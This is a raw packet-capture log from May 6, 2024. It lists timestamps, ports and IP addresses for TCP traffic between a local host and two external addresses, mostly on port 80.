May 6, 2024 07:53:04.011231899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011245012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011246920 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011276007 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011301994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011327982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011338949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011349916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011364937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011375904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011379957 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011388063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011399031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011411905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011414051 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011425018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011426926 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011439085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011451006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011455059 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011464119 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011482000 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011499882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011502981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011517048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011528015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011540890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011552095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011559010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011568069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011576891 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011580944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011596918 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011626959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011635065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011648893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011661053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011673927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011687040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011691093 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011698961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011709929 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011710882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011723042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011723995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011737108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011750937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011754990 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011763096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011775017 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011780024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011786938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011796951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011799097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011811972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011823893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011827946 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011835098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011847019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011852980 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011858940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011872053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011876106 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011884928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011888027 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011898041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011910915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011920929 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011949062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.021703005 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.103487968 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:04.103554010 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:04.103671074 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:04.258347034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258362055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258424044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.258426905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258440018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258451939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258465052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258477926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258483887 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.258496046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258502007 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.258507967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258519888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258522034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.258532047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258538008 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.258543968 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258554935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.258557081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258568048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258579969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258584023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.258590937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258599043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.258603096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258614063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258624077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.258625984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258637905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258649111 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.258651018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258666039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258667946 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.258678913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258691072 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.258692026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258714914 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.258721113 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.258727074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258738995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258750916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258761883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258764982 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.258774996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258788109 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.258812904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.258850098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258862019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258873940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258883953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258887053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.258896112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258907080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258915901 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.258919001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258930922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258939028 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.258953094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.258971930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258977890 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.258985043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.258995056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259007931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259010077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259018898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259028912 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259030104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259042978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259052992 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259056091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259067059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259071112 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259078979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259090900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259094954 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259103060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259114027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259124994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259125948 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259136915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259138107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259166956 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259187937 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259258986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259298086 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259330988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259342909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259373903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259381056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259386063 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259393930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259406090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259418011 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259429932 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259443045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259449959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259455919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259466887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259486914 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259495974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259507895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259519100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259530067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259542942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259546995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259572983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259576082 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259583950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259593010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259596109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259607077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259618044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259619951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259644032 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259658098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259658098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259671926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259682894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259695053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259696007 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259708881 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259725094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259737015 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259768009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259779930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259790897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259803057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259803057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259813070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259819984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259824991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259830952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259836912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259849072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259851933 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259860992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259874105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259881020 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259886026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259897947 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259915113 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259927988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259932041 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259941101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259952068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259963989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259965897 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259979963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.259993076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.259996891 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260004997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260015965 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260016918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260027885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260040998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260046959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260078907 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260118008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260129929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260139942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260152102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260159016 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260164022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260175943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260178089 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260186911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260198116 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260199070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260210037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260212898 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260221004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260232925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260243893 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260245085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260257959 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260271072 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260284901 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260308027 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260309935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260324001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260334969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260346889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260354042 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260359049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260368109 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260390043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260411978 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260452032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260463953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260473013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260487080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260497093 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260499001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260504961 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260512114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260523081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260526896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260535002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260545969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260555029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260559082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260572910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260588884 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260611057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260627985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260641098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260652065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260663986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260668993 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260674000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260683060 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260701895 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260704994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260718107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260727882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260729074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260740995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260751963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260752916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260765076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260777950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260777950 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260792971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260796070 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260804892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260818005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260821104 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260844946 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260847092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260859013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260863066 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260869980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260881901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260885954 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260894060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260905027 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260905981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260919094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260924101 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260948896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260948896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260961056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260967016 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260972977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260987043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.260993958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.260998964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261003017 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261013985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261024952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261024952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261053085 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261065006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261066914 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261077881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261090994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261101007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261106014 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261122942 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261147022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261163950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261200905 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261236906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261250019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261261940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261270046 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261288881 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261307001 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261321068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261357069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261360884 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261373043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261394978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261398077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261408091 CEST	80	49741	5.42.66.10	192.168.2.4
